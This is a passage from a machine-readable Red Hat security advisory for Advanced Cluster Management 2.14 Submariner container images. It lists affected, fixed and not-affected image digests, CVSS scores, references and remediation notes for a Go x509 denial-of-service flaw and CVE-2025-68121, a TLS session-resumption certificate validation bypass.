"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is a moderate flaw because it only occurs under specific conditions, such as TLS session resumption with runtime changes to certificate authority settings. Exploitation is not straightforward and requires a controlled setup. The impact is limited to certificate validation within the same component and does not affect system availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T20:51:55+00:00",
"details": "For release note details, see the upstream Submariner release notes:\n\nhttps://submariner.io/community/releases/\n\nDownstream-specific issues resolved:\n* ACM-27238\n* ACM-28294\n* ACM-28295\n* ACM-28311\n* ACM-28313\n* ACM-28314\n* ACM-28315\n* ACM-28316\n* ACM-28329\n* ACM-28331\n* ACM-28333\n* ACM-28335\n* ACM-28337\n* ACM-28339\n* ACM-28342\n* ACM-29317\n* ACM-29511\n* ACM-29613\n* ACM-29614\n* ACM-29631\n* ACM-29632\n* ACM-29633\n* ACM-29634\n* ACM-29776\n* ACM-30134\n* ACM-30726\n* ACM-30727\n* ACM-30728\n* ACM-30729\n* ACM-30970\n* ACM-31136\n* ACM-31831\n* ACM-31840\n* ACM-32575\n* ACM-32842\n* ACM-34108\n* ACM-34586\n* ACM-34589\n\nFor more details, see the Red Hat Advanced Cluster Management for Kubernetes documentation:\n\nhttps://docs.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.14/",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
